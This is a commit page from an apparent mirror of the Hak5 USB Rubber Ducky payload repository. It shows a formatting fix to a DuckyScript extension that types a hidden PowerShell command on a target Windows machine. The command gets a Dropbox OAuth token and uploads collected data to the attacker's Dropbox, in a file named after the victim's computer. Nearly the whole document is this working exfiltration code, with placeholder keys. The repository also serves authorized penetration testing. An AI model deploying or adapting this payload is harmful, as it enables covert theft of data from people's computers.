hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed format

pull/320/head
Julien Morice 2023-04-30 03:24:34 +02:00 committed by GitHub
parent 3554052ae7
commit c15093042b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
payloads/extensions/community/PowerShell_To_Dropbox.txt
View File

@ -1,21 +1,25 @@
REM Title: PowerShell_To_Dropbox
REM Author: Who-Is-Julien
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
REM Target: Windows 10, 11
EXTENSION PowerShell_To_Dropbox
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
REM Title: PowerShell_To_Dropbox
REM Author: Who-Is-Julien
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
REM Target: Windows 10, 11
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
DEFINE APP_KEY XXXXXXXXXXXXXXX
DEFINE APP_SECRET XXXXXXXXXXXXXXX
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
DEFINE APP_KEY XXXXXXXXXXXXXXX
DEFINE APP_SECRET XXXXXXXXXXXXXXX
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
STRING REFRESH_TOKEN
STRING "; client_id = "
STRING APP_KEY
STRING "; client_secret = "
STRING APP_SECRET
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
STRING REFRESH_TOKEN
STRING "; client_id = "
STRING APP_KEY
STRING "; client_secret = "
STRING APP_SECRET
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
DELAY 500
ENTER
END_EXTENSION